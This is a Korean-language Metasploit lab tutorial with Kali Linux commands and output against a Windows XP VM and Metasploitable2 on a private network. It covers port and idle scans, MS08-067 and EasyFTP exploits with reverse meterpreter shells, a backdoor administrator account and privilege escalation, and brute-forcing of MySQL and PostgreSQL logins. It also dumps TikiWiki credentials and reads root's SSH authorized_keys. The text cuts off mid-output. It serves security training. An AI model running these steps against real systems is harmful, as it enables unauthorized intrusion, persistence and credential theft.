메타스플로잇 시작하는 방법 (칼리리눅스)
root@kali:~# msfconsole
--버전 확인
root@kali:~# msfconsole -v
Framework Version: 4.13.2-dev
PostgressSQL 서버와 MSF 연동
root@kali:~# service postgresql start -----> 포스트그레스 DB 시작
root@kali:~# msfdb (도움말)
Manage a metasploit framework database
msfdb init # initialize the database
msfdb reinit # delete and reinitialize the database
msfdb delete # delete database and stop using it
msfdb start # start the database
msfdb stop # stop the database
root@kali:~# msfdb init ---> 초기화 시작
root@kali:~# msfconsole
msf > db_status --------------> 포스트그레스 sql서버와 msf사이의 연결상태를 나타내는 명령어
[*] PostgreSQL connected to msf
msf >
msf>
msf>
msf > quit or exit로 나간다...
메타스플로잇 명령어 및 사용 방법
1) idle scan : 비활성화된 target의 ipid스캔(스푸핑 ip주소 및 좀비pc선정)
[실습 단계]
스캔 -> 취약점 공격 -> ID/PASSWORD 획득 -> 악성 코드 유입 -> 제어권 획득
1, 스캐닝(scanning)
msf > search ipidseq
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/ip/ipidseq normal IPID Sequence Scanner
msf > use auxiliary/scanner/ip/ipidseq
SNAPLEN 65535 no The number of bytes to capture // 캡처할 용량 지정
THREADS 1 yes The number of concurrent threads // 쓰레드 지정(낮으면 느림)
TIMEOUT 500 yes The reply read timeout in milliseconds // 응답 속도 지정
(낮게 조정 권장)
yes는 무조건 설정해야하며 no는 설정하지 않아도 된다.
msf auxiliary(ipidseq) > set INTERFACE eth1 -----------> 인터페이스 eth1설정
INTERFACE => eth11
msf auxiliary(ipidseq) > set RHOSTS 192.168.20.0/24 ---> 인터넷에 연결되어 있는 host 192.168.20.0/24 대역검색
HOSTS => 192.168.20.0/24
msf auxiliary(ipidseq) > set RPORT 80 포트80 검색
HOSTS => 80
msf auxiliary(ipidseq) > set THREADS 16
THREADS => 16
msf auxiliary(ipidseq) > run
[*] Scanned 105 of 256 hosts (41% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 155 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] 192.168.20.201's IPID sequence class: Incremental! // (스푸핑 IP 주소로 선정 가능)
[*] 192.168.20.200's IPID sequence class: All zeros
[*] 192.168.20.203's IPID sequence class: Incremental! // (스푸핑 IP 주소로 선정 가능)
[*] Scanned 207 of 256 hosts (80% complete)
[*] Scanned 236 of 256 hosts (92% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
- '192.168.20.201' 주소를 이용하여 Linux200 에 대한 스캐닝
-Pn : Treat all hosts as online -- skip host discovery
-sI <zombie host[:probeport]>: Idle scan
msf auxiliary(ipidseq) > db_nmap -Pn -sI 192.168.20.201 192.168.20.200
---->192.168.20.201 주소로 192.168.20.201주소에 대한 스캔
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-01 13:44 KST
[*] Nmap: Idle scan using zombie 192.168.20.201 (192.168.20.201:80); Class: Incremental
[*] Nmap: Nmap scan report for 192.168.20.200
[*] Nmap: Host is up (0.053s latency).
[*] Nmap: Not shown: 988 closed|filtered ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 21/tcp open ftp
[*] Nmap: 22/tcp open ssh
[*] Nmap: 23/tcp open telnet
[*] Nmap: 25/tcp open smtp
[*] Nmap: 53/tcp open domain
[*] Nmap: 80/tcp open http
[*] Nmap: 110/tcp open pop3
[*] Nmap: 111/tcp open rpcbind
[*] Nmap: 143/tcp open imap
[*] Nmap: 443/tcp open https
[*] Nmap: 993/tcp open imaps
[*] Nmap: 995/tcp open pop3s
[*] Nmap: MAC Address: 00:0C:29:72:28:7C (VMware)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.37 seconds
정리하자면.
.... 아래와 같은 순서대로 명령어를 진행하면된다..... show options하게되면 무엇을 setting해야하는지 보여준다.
use auxiliary/scanner/ip/ipidseq
set INTERFACE eth1
set RPORT 80
set THREADS 16
SYn Scan :공격 타겟에 대한 포트 상태 여부를 확인하는 스켄 (nmap 처럼 다양한 정보를 스캔할 수 없음
search portscan ---> 해당되는 포트스캔도구의 경로를 찾는다...(복사실시)
use auxiliary/scanner/portscan/syn
set INTERFACE eth1
set PORTS 1-100
set RHOSTS 192.168.20.200
set THREADS 16
run
[*] TCP OPEN 192.168.20.200:21
[*] TCP OPEN 192.168.20.200:22
[*] TCP OPEN 192.168.20.200:23
[*] TCP OPEN 192.168.20.200:25
[*] TCP OPEN 192.168.20.200:53
[*] TCP OPEN 192.168.20.200:80
smb scan : windows net-bios를 이용한 스캔
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.20.0/24
set threads 16
run
ftp scan
use auxiliary/scanner/ftp/anonymous
set rhosts 192.168.20.0/24
set threads 256
run
Exploit Tools (취약점 발견 -> 공격실시)
실습 단계]
스캔 -> 취약점 공격 -> ID/PASSWORD 획득 -> 악성 코드 유입 -> 제어권 획득
(1)db_nmap 스캔
-sS : TCP Half Open Scan
-p : Port Number
msf > db_nmap -sS -p 1-500 192.168.20.203
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 21/tcp open ftp
[*] Nmap: 25/tcp open smtp
[*] Nmap: 80/tcp open http
[*] Nmap: 135/tcp open msrpc
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 443/tcp open https
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:69:FF:FD (VMware)
msf > db_nmap -sS -Pn -A -p 1-500 192.168.20.203
~중간생략~
-sS : TCP Half Open Scan 공격자가 reset하여 공격했던 포트의 자취를 감춤
-Pn : Treat all hosts as online -- skip host discovery(온라인상에 관리하는 모든 호스트를 관리하는데 호스트가 발견되면 넘기겠다는 의미
-A : Enable OS detection, version detection, script scanning, and traceroute
-p : Port Number
[*] Nmap: OS details: Microsoft Windows XP SP3 ---> 정보확인
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host: with-15b28b4cfd; OSs: Windows, Windows 98, Windows XP; CPE:
cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_xp
[*] Nmap: Host script results:
[*] Nmap: | ms-sql-info:
[*] Nmap: | \\192.168.20.203\pipe\sql\query:---> 정보확인
windows/shell/reverse_tcp' Payload 공격 모듈
msf에서 payload란 악성코드를 의미한다. 예를 들어 use exploit/windows/smb/ms08_067_netapi 침투코드를 설정한 뒤 악성코드로 사용하겠다는 의미이다.
search ms08-067
use exploit/windows/smb/ms08_067_netapi
show options
Payload options (windows/shell/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
show targets
44 Windows XP SP3 Hungarian (NX)
45 Windows XP SP3 Italian (NX)
46 Windows XP SP3 Japanese (NX)
47 Windows XP SP3 Korean (NX)
48 Windows XP SP3 Dutch (NX)-------47번 타겟 선택
set LHOST 192.168.20.50
set LPORT 8080
set RHOST 192.168.20.203
set target 47
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse TCP handler on 192.168.20.50:8080
[*] Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.20.203
[*] Command shell session 1 opened (192.168.20.50:8080 -> 192.168.20.203:1051) at 2016-06-01 16:15:10
+0900
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration --> 바로 windows xp컴퓨터로 연결되어 정보확인이 가능했다.
Ethernet adapter :
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.20.203
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.20.100
C:\WINDOWS\system32> (ctrl+c)
Abort session 1? [y/N] y
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp---> 침투코드를 설정
msf exploit(ms08_067_netapi) > exploit,,,, set payload하게 되면 아까전에는 바로 연결되었지만 shell이라는 명령어를 입력해야 들어갈 수있다.
meterpreter > shell
C:\WINDOWS\system32>
C:\WINDOWS\system32>ipconfig
meterpreter > sysinfo > 시스템정보호가인
Computer : WITH-15B28B4CFD
OS : Windows XP (Build 2600, Service Pack 3).
meterpreter > ps -> 프로세스 정보 확인
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x86 0 NT AUTHORITY\SYSTEM
368 4 smss.exe x86 0 NT
AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
meterpreter > screenshot (스크린샷)
Screenshot saved to: /root/DyxZRLRF.jpeg
FTP 취약점을 이용한 공격 (WindowXP FTP : eastFTP 1.7.0.11 실행)
search easyftp
use exploit/windows/ftp/easyftp_cwd_fixret
show payloads
show targets
9 Windows Universal - v1.7.0.11
set PAYLOAD windows/meterpreter/reverse_tcp
set target 9
set RHOST 192.168.20.203
set LHOST 192.168.20.50
exploit
백도어 계정 생성 및 계정 권한 상승 실시
meterpreter > shell
Process 1776 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>net user test test1234 /add // 삭제 : net user test /delete
net user test test1234 /add 아이디 패스워드를 생성하는 명령어
C:\WINDOWS\system32>net user
net user
-------------------------------------------------------------------------------
admin Administrator ASPNET
Guest HelpAssistant IUSR_WITH-15B28B4CFD
IWAM_WITH-15B28B4CFD test
C:\WINDOWS\system32>net localgroup administrators test /add 테스트 사용자가 관리자그룹으로 변경
net localgroup administrators test /add
C:\WINDOWS\system32>exit
exit
meterpreter >
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
- 타겟 시스템 재부팅
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x86 0 NT AUTHORITY\SYSTEM
~ 중간 생략 ~
1216 1188 explorer.exe x86 0 WITH-15B28B4CFD\admin C:\WINDOWS\Explorer.EXE
1348 800 wuauclt.exe x86 0 WITH-
15B28B4CFD\admin C:\WINDOWS\system32\wuauclt.exe
~ 중간 생략 ~
meterpreter > migrate 1216(프로세스id) 이주하다,옮기다.,,, 공격자가 해당프로세스를 가져옴
meterpreter > reboot
- msfdb 를 삭제하고 다시 생성한다.
root@kali:~# msfdb delete
root@kali:~#
root@kali:~# msfdb init
외부 스캔 파일 사용하는 방법
- 스캔이 완료, 'scan1.xml' 파일로 '/root' 디렉토리에 저장 (scan -> scan save)
- msfconsole을 시작한다. 이때, DB 연동 및 기록을 확인
root@kali:~# msfconsole
msf > db_status
[*] postgresql connected to msf
msf > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
msf > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
-----------> 현재 아무것도 db에 기록되지 않았다.
- '/root/scan1.xml' 스켄 파일을 msfconsole로 import를 실시한다.
msf > db_import /root/scan1.xml
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.6.7'
[*] Importing host 192.168.20.204
[*] Successfully imported /root/scan1.xml
msf > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.20.204 00:0c:29:34:5a:8a Linux 2.6.X server
msf > services
Services
========
host port proto name state info
---- ---- ----- ---- ----- ----
192.168.20.204 21 tcp ftp open vsftpd 2.3.4
192.168.20.204 22 tcp ssh open OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.20.204 23 tcp telnet open Linux telnetd
192.168.20.204 25 tcp smtp open Postfix smtpd
192.168.20.204 53 tcp domain open ISC BIND 9.4.2
192.168.20.204 80 tcp http open Apache httpd 2.2.8 (Ubuntu) DAV/2
~중간생략
msf > notes
[*] Time: 2016-06-02 06:37:34 UTC Note: host=192.168.20.204 type=host.imported data={:filename=>"/root/scan1.xml", :type=>"Nmap XML", :time=>2016-06-02 06:37:34 UTC}
[*] Time: 2016-06-02 06:37:36 UTC Note: host=192.168.20.204 type=host.os.nmap_fingerprint data={:os_vendor=>"Linux", :os_family=>"Linux", :os_version=>"2.6.X", :os_accuracy=>100}
[*] Time: 2016-06-02 06:37:36 UTC Note: host=192.168.20.204 type=host.last_boot data={:time=>"Thu Jun 2 14:28:03 2016"}
공격 타겟 스캐닝
search portscan
use auxiliary/scanner/portscan/syn
set INTERFACE eth1
set PORTS 1-500
set RHOSTS 192.168.20.204
set THREADS 50
run
[*] TCP OPEN 192.168.20.204:21
[*] TCP OPEN 192.168.20.204:22
[*] TCP OPEN 192.168.20.204:23
[*] TCP OPEN 192.168.20.204:25
[*] TCP OPEN 192.168.20.204:53
[*] TCP OPEN 192.168.20.204:80
[*] TCP OPEN 192.168.20.204:111
[*] TCP OPEN 192.168.20.204:139
[*] TCP OPEN 192.168.20.204:445
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
db_nmap 스캔
-sV: Probe open ports to determine service/version info
-O: Enable OS detection
-p <port ranges>: Only scan specified ports
-v: Increase verbosity level (use -vv or more for greater effect
)
msf > db_nmap -sV -O -p1-500 -v 192.168.20.204
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 2.3.4
[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: 23/tcp open telnet Linux telnetd
[*] Nmap: 25/tcp open smtp Postfix smtpd
[*] Nmap: 53/tcp open domain ISC BIND 9.4.2
[*] Nmap: 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
[*] Nmap: 111/tcp open rpcbind 2 (RPC #100000)
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 21.16 seconds
[*] Nmap: Raw packets sent: 538 (26.104KB) | Rcvd: 534 (23.816KB)
msf >
msf > quit
취약점 발견 및 공격 (MySQL 원격 로그인 시도)
(1)아이디/패스워드 사전 파일 생성
Kali Linux
- 아이디/패스워드 사전 파일을 간단하게 생성한다. (Metasploitable2-Linux 는 MySQL root 패스워드가 없음)
root@kali:~# cd /usr/share/metasploit-framework/data/wordlists/
root@kali:/usr/share/metasploit-framework/data/wordlists# vi user.txt(아이디)
root
admin
: wq!
root@kali:/usr/share/metasploit-framework/data/wordlists# vi pass.txt(패스워드)
<공백>
root
admin
(2)db_nmap 스캔 실시
- '192.168.20.204'를 타겟으로 db_nmap 스켄을 실시한다.
-sV: Probe open ports to determine service/version info
root@kali:~# msfconsole
msf > db_nmap -sV 192.168.20.204
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-02 16:29 KST
[*] Nmap: Nmap scan report for 192.168.20.204
[*] Nmap: Host is up (0.00021s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 2.3.4
[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: 23/tcp open telnet Linux telnetd
[*] Nmap: 25/tcp open smtp Postfix smtpd
[*] Nmap: 53/tcp open domain ISC BIND 9.4.2
[*] Nmap: 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
[*] Nmap: 111/tcp open rpcbind 2 (RPC #100000)
[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 512/tcp open exec netkit-rsh rexecd
[*] Nmap: 513/tcp open login?
[*] Nmap: 514/tcp open shell Netkit rshd
[*] Nmap: 1099/tcp open rmiregistry GNU Classpath grmiregistry
[*] Nmap: 1524/tcp open shell Metasploitable root shell
[*] Nmap: 2049/tcp open nfs 2-4 (RPC #100003)
[*] Nmap: 2121/tcp open ftp ProFTPD 1.3.1
[*] Nmap: 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5
search mysql_login
use auxiliary/scanner/mysql/mysql_login normal MySQL Login Utility
msf > use auxiliary/scanner/mysql/mysql_login
show options
set RHOSTS 192.168.20.204
set USER_FILE /usr/share/metasploit-framework/data/wordlists/user.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/pass.txt
run
msf auxiliary(mysql_login) > run
[*] 192.168.20.204:3306 MYSQL - Found remote MySQL version 5.0.51a
[+] 192.168.20.204:3306 MYSQL - Success: 'root:'
취약점 발견 및 공격 (tikiwiki 취약점 공격)
- 메타스플로잇을 이용하여 취약점을 발견한 다음, tikiwiki 취약점을 공격
- tikiwiki : MySQL DB 사용하는 위키 서비스(다른 위키보다 많이 사용하고 있는 편)
- 참고 사이트 : http://tiki.org, http://tehemes.tiki.org
[참고] 위키(Wiki)
인터넷이나 회사 내부용 게시판 형식의 웹-서비스이며, 게시물/문서를 공동으로 취급하여 작업이 가능한 서비스이다.
[실습 단계]
tikiwiki195' DB 생성 -> 스캔 -> tikiwiki 취약점 공격 -> MySQL ID/PASSWORD 획득 -> tikiwiki MySQL 접속 ->
-> tikiwiki195 DB 접근 및 ID/PASSWORD 확인 -> 웹-접속 및 관리자 로그인 실시
Ex1) Metasploitable2-Linux MySQL 'tikiwiki195 DB' 생성
@ Kali Linux
- 취약점 테스트를 하기 위하여 Metasploitable2-Linux MySQL DB에 'tikiwiki195' DB를 생성한다.
root@kali:~# firefox http://192.168.20.204/tikiwiki/tiki-index.php
'
go here to begin the installation process' 클릭
root 계정으로 'tikiwiki195' DB 생성 -> Submit Query 클릭
~
중간 생략 ~
create 클릭 -> Firefox 종료
- Metasploitable2-Linux에서 'tikiwiki195' DB 생성 확인 실시
@ Metasploitable2-Linux
msfadmin@metasploitable:~$ mysql -u root -p
Enter password: (엔터)
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 14
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
7 rows in set (0.00 sec)
mysql> quit
Bye
msfadmin@metasploitable:~$
'tikiwiki' 취약점 검색 및 공격
- '192.168.20.204'를 타겟으로 db_nmap 스켄을 실시한다.
@ Kali Linux
-sV: Probe open ports to determine service/version info
root@kali:~# msfconsole
msf > db_nmap -sV 192.168.20.204
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-02 16:29 KST
[*] Nmap: Nmap scan report for 192.168.20.204
[*] Nmap: Host is up (0.00021s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 2.3.4
[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: 23/tcp open telnet Linux telnetd
[*] Nmap: 25/tcp open smtp Postfix smtpd
[*] Nmap: 53/tcp open domain ISC BIND 9.4.2
[*] Nmap: 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
[*] Nmap: 111/tcp open rpcbind 2 (RPC #100000)
[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 512/tcp open exec netkit-rsh rexecd
~ 중간 생략 ~
msf > search tikiwiki
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/admin/tikiwiki/tikidblib 2006-11-01 normal TikiWiki Information Disclosure
exploit/unix/webapp/php_xmlrpc_eval 2005-06-29 excellent PHP XML-RPC Arbitrary Code Execution
exploit/unix/webapp/tikiwiki_graph_formula_exec 2007-10-10 excellent TikiWiki tiki-graph_formula Remote PHP Code Execution
exploit/unix/webapp/tikiwiki_jhot_exec 2006-09-02 excellent TikiWiki jhot Remote Command Execution
exploit/unix/webapp/tikiwiki_unserialize_exec 2012-07-04 excellent Tiki Wiki unserialize() PHP Code Execution
msf > use auxiliary/admin/tikiwiki/tikidblib
msf auxiliary(tikidblib) >
msf auxiliary(tikidblib) > show options
Module options (auxiliary/admin/tikiwiki/tikidblib):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST yes The target address
RPORT 80 yes The target port
URI /tikiwiki yes TikiWiki directory path
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
Download
msf auxiliary(tikidblib) > set RHOST 192.168.20.204
RHOST => 192.168.20.204
msf auxiliary(tikidblib) > run
[*] Establishing a connection to the target...
[*] Get informations about database...
[*] Install path : /var/www/tikiwiki/lib/tikidblib.php
[*] DB type : mysql
[*] DB name : tikiwiki195
[*] DB host : localhost
[*] DB user : root
[*] DB password :
[*] Auxiliary module execution completed
msf auxiliary(tikidblib) >
msf auxiliary(tikidblib) > quit
root@kali:~#
- Metasploitable2-Linux으로 접속하여 MySQL 정보 확인 실시
@ Kali Linux
root@kali:~# telnet 192.168.20.204
~ 중간 생략~
Warning: Never expose this VM to an untrusted network!
Contact: msfdev[at]metasploit.com
Login with msfadmin/msfadmin to get started
metasploitable login: msfadmin
Password: msfadmin
msfadmin@metasploitable:~$ mysql -u root -p
Enter password: (엔터)
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 193
Server version: 5.0.51a-3ubuntu5 (Ubuntu)
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql>
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
7 rows in set (0.00 sec)
mysql> use tikiwiki195
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
~ 중간 생략 ~
| users_objectpermissions |
| users_permissions |
| users_usergroups |
| users_users |
+------------------------------------+
194 rows in set (0.00 sec)
mysql> select * from users_users;
+--------+-------+-------+----------+----------+---------------+------------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+
| userId | email | login | password | provpass | default_group | lastLogin | currentLogin | registrationDate | challenge | pass_due | hash | created | avatarName | avatarSize | avatarFileType | avatarData | avatarLibName | avatarType | score |
+--------+-------+-------+----------+----------+---------------+------------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+
| 1 | | admin | admin | NULL | NULL | 1271712540 | 1271712540 | NULL | NULL | NULL | f6fdffe48c908deb0f4c3bd36c032e72 | NULL | NULL | NULL | NULL | NULL | NULL | NULL | 0 |
+--------+-------+-------+----------+----------+---------------+------------+--------------+------------------+-----------+----------+----------------------------------+---------+------------+------------+----------------+------------+---------------+------------+-------+
1 row in set (0.01 sec)
mysql> select login,password from users_users;
+-------+----------+
| login | password |
+-------+----------+
| admin | admin |
+-------+----------+
1 row in set (0.00 sec)
mysql> quit
Bye
msfadmin@metasploitable:~$
msfadmin@metasploitable:~$ exit
Connection closed by foreign host.
- 웹으로 접속하여 'admin/admin'으로 접속 테스트 실시
@ Kali Linux
root@kali:~# firefox http://192.168.20.204/tikiwiki/tiki-index.php
'admin/admin'으로 로그인 실시
Kali Linux
- 파이어폭스를 실행하여 다음과 같이 접속을 실시한다.
root@kali:~# firefox &
http://192.168.20.204/tikiwiki/tiki-listpages.php?offset=0&sort_mode=
접속되면, 밑으로 내려서 'root' 패스워드 확인
취약점 발견 및 공격 (CVE-2008-0166)
스캔 -> PostgresSQL ID/PASSWORD 공격 -> PostgressSQL 접속 -> 사용자 계정 정보 획득 -> SSH Key 해킹
-> SSH 접속 실시
Metasploitable2-Linux
msfadmin@metasploitable:~$ sudo -s
[sudo] password for msfadmin: msfadmin
root@metasploitable:~# passwd
Enter new UNIX password: toor
Retype new UNIX password : toor
passwd : password updated successfully
root@metasploitable:~# exit
Kali Linux
- Exploit DB OpenSSL 검색
root@kali:~# /usr/share/exploitdb/searchsploit openssl
--------------------------------------------------------------------- ----------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
--------------------------------------------------------------------- ----------------------------------
OpenSSL ASN.1<= 0.9.6j <= 0.9.7b - Brute Forcer for Parsing Bugs | ./multiple/dos/146.c
Apache OpenSSL - Remote Exploit (Multiple Targets) (OpenFuckV2.c) | ./linux/remote/764.c
OpenSSL < 0.9.7l / 0.9.8d - SSLv2 Client Crash Exploit | ./multiple/dos/4773.pl
Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (Perl) | ./multiple/remote/5622.txt
-SSH RSA 관련 파일 다운로드
root@kali:~# cd /var/tmp
root@kali:/var/tmp#
root@kali:/var/tmp# wget --no-check-certificate https://github.com/offensive-security/exploit-database-binsploits/
raw/master/sploits/5622.tar.bz2
--2016-06-03 11:28:57-- https://github.com/offensive-security/exploit-database-binsploits/
raw/master/sploits/5622.tar.bz2
Resolving github.com (github.com)... 192.30.252.121
~중간생략
SSH RSA 파일 압축 해지 실시
root@kali:/var/tmp# tar xvif 5622.tar.bz2
rsa/
rsa/2048/
rsa/2048/2712a6d5cec99f295a0c468b830a370d-28940.pub
rsa/2048/eaddc9bba9bf3c0832f443706903cd14-28712.pub
~ 중간 생략 ~
root@kali:/var/tmp# cd
'192.168.20.204' 스캔
- nmap 을 이용하여 '192.168.20.204'에 대해서 스캔
Kali Linux
root@kali:~# nmap -sV 192.168.20.204
Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-03 12:06 KST
Nmap scan report for 192.168.20.204
Host is up (0.00061s latency).
Not shown: 977 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7
~중간생략
PostgreSQL 아이디/패스워드 사전 파일 공격
root@kali:~# msfconsole -q
msf > search postgres_login
msf > use auxiliary/scanner/postgres/postgres_login
msf auxiliary(postgres_login) > show options
~중간생략~
RHOSTS yes The target address
range or CIDR identifier
RPORT 5432 yes The target port
STOP_ON_SUCCESS false yes Stop guessing
when a credential works for a host
msf auxiliary(postgres_login) > set RHOSTS 192.168.20.204
RHOSTS => 192.168.20.204
msf auxiliary(postgres_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf auxiliary(postgres_login) > exploit(부당하게 사용핟다)
[-] 192.168.20.204:5432 POSTGRES - LOGIN FAILED: postgres:@template1 (Incorrect: Invalid username or
password)
[-] 192.168.20.204:5432 POSTGRES - LOGIN FAILED: postgres:tiger@template1 (Incorrect: Invalid username or
password)
[+] 192.168.20.204:5432 - LOGIN SUCCESSFUL: postgres:postgres@template1
PostgresSQL 서버 접속 실시 및 DB 확인
접속
root@kali:~# psql -h 192.168.20.204 -U postgres ---> psql(데이터베이스 192.168.20.204 postgress로 접속)
Password for user postgres: postgres
- 사용자 테이블 확인
postgres=# select * from pg_user;
usename | usesysid | usecreatedb | usesuper | usecatupd | passwd | valuntil | useconfig
----------+----------+-------------+----------+-----------+----------+----------+-----------
postgres | 10 | t | t | t | ******** | |
(1 row)
'test' 사용자 추가 및 확인
postgres=# create user test with password 'test1234';
CREATE ROLE
postgres=# select * from pg_user;
usename | usesysid | usecreatedb | usesuper | usecatupd | passwd | valuntil | useconfig
----------+-----------+--------------+----------+-----------+----------+----------+-----------
postgres | 10 | t | t | t | ******** | |
test | 16384 | f | f | f | ******** | |
'test' 사용자 권한 상승 및 확인
postgres=# alter user test with superuser;
ALTER ROLE
postgres=# select * from pg_user;
usename | usesysid | usecreatedb | usesuper | usecatupd | passwd | valuntil | useconfig
----------+-----------+--------------+----------+-----------+----------+----------+-----------
postgres | 10 | t | t | t | ******** | |
test | 16384 | f | t | f | ******** | |
(2 rows)
- 모든 스키마 확인 및 데이터베이스 확인
postgres-# \dn
List of schemas
Name | Owner
--------+----------
public | postgres
(1 row)
postgres-# \l
List of databases
Name | Owner | Encoding | Access privileges
-----------+----------+----------+-----------------------
postgres | postgres | UTF8 |
template0 | postgres | UTF8 | =c/postgres +
| | | postgres=CTc/postgres
template1 | postgres | UTF8 | =c/postgres +
| | | postgres=CTc/postgres
(3 rows)
- accounts 테이블 생성 및 '/etc/passwd' 내용 복사
postgres=# create table accounts (linux_users text);
CREATE TABLE
- accounts 테이블 내용에 'bash' 글자가 들어간 내용 확인
postgres=# select * from accounts where linux_users like '%bash%';
linux_users
------------------------------------------------------------------------------
root:x:0:0:root:/root:/bin/bash
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash
(5 rows)
- sshkeys 테이블 생성 및 '/root/.ssh/authorized_keys' 내용 복사
postgres=# create table sshkeys (auth_key text);
CREATE TABLE
postgres=# copy sshkeys from '/root/.ssh/authorized_keys';
COPY 1
- sshkeys 테이블 내용에 'ssh-rsa' 글자가 들어간 내용 확인
postgres=# select * from sshkeys where auth_key like '%ssh-rsa%';
auth_key
---------------------------------------------------------------------------------------------------------
---------------------------------------------------------------------------------------------------------
